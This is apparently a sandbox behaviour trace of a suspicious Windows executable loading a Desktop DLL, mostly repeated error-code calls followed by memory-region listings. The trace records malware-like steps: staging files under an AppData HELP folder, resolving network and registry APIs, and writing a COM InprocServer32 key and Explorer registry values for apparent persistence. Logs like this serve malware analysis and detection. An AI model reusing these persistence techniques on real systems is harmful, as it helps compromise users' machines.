[0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.091] SetLastError (dwErrCode=0x0) [0036.091] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.092] SetLastError (dwErrCode=0x0) [0036.092] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.093] SetLastError (dwErrCode=0x0) [0036.093] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.094] SetLastError (dwErrCode=0x0) [0036.094] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.095] SetLastError (dwErrCode=0x0) [0036.095] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.096] SetLastError (dwErrCode=0x0) [0036.096] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.097] SetLastError (dwErrCode=0x0) [0036.097] GetLastError () returned 0x0 [0036.103] SetLastError (dwErrCode=0x0) [0036.104] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.104] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.104] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.105] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f3b0 | out: lpSystemTimeAsFileTime=0x16f3b0*(dwLowDateTime=0xe334b630, dwHighDateTime=0x1d3dfba)) [0036.106] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f2e8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.106] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f1d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetLastError () returned 0x0 [0036.106] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.107] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.107] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.107] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.107] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.107] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.107] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.107] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.107] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.107] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.107] GetLastError () returned 0xb7 [0036.107] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.107] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.107] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.107] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.107] wsprintfA (in: param_1=0x16f050, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.108] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.108] wsprintfA (in: param_1=0x16ef4c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.108] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.108] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.108] CloseHandle (hObject=0x74) returned 1 [0036.108] GetLastError () returned 0x0 [0036.108] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.108] GetLastError () returned 0x0 [0036.108] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.108] GetSystemDirectoryA (in: lpBuffer=0x16f050, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.108] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.108] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.108] CloseHandle (hObject=0x74) returned 1 [0036.108] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.109] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.109] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.110] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.111] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.111] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.111] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.111] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.111] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.111] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.111] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.111] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.111] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.111] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.111] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.111] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.111] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.112] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0036.113] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.113] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.114] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.114] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.114] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.114] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.115] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.115] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0036.115] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.115] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.115] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.115] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.115] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.115] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.115] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.115] GetVersionExW (in: lpVersionInformation=0x16f5d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16f5d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0036.115] GetLastError () returned 0x7f [0036.115] SetLastError (dwErrCode=0x7f) [0036.115] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x16f2c8, lpdwDisposition=0x0 | out: phkResult=0x16f2c8*=0x7c, lpdwDisposition=0x0) returned 0x0 [0036.115] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="iexplore.exe", cbData=0x1a | out: lpData="iexplore.exe") returned 0x0 [0036.116] GetLastError () returned 0x7f [0036.116] GetLastError () returned 0x7f [0036.116] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x16f3d4, lpdwDisposition=0x16f530 | out: phkResult=0x16f3d4*=0x80, lpdwDisposition=0x16f530*=0x2) returned 0x0 [0036.116] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x16f3d8*=0xe10, cbData=0x4 | out: lpData=0x16f3d8*=0xe10) returned 0x0 [0036.116] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x16f3d8*=0x1, cbData=0x4 | out: lpData=0x16f3d8*=0x1) returned 0x0 [0036.116] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0036.116] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x16f47c*, cbData=0x58 | out: lpData=0x16f47c*) returned 0x0 [0036.116] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x16f4d4*, cbData=0x5c | out: lpData=0x16f4d4*) returned 0x0 [0036.116] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0036.116] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0036.116] RegCloseKey (hKey=0x80) returned 0x0 [0036.118] HeapDestroy (hHeap=0x250000) returned 1 Process: id = "66" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f6c0" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2875 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2876 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2877 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2878 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2879 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2880 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2881 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2882 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2883 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 2884 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2885 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2886 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2887 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2888 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2889 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2890 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2891 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2892 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = 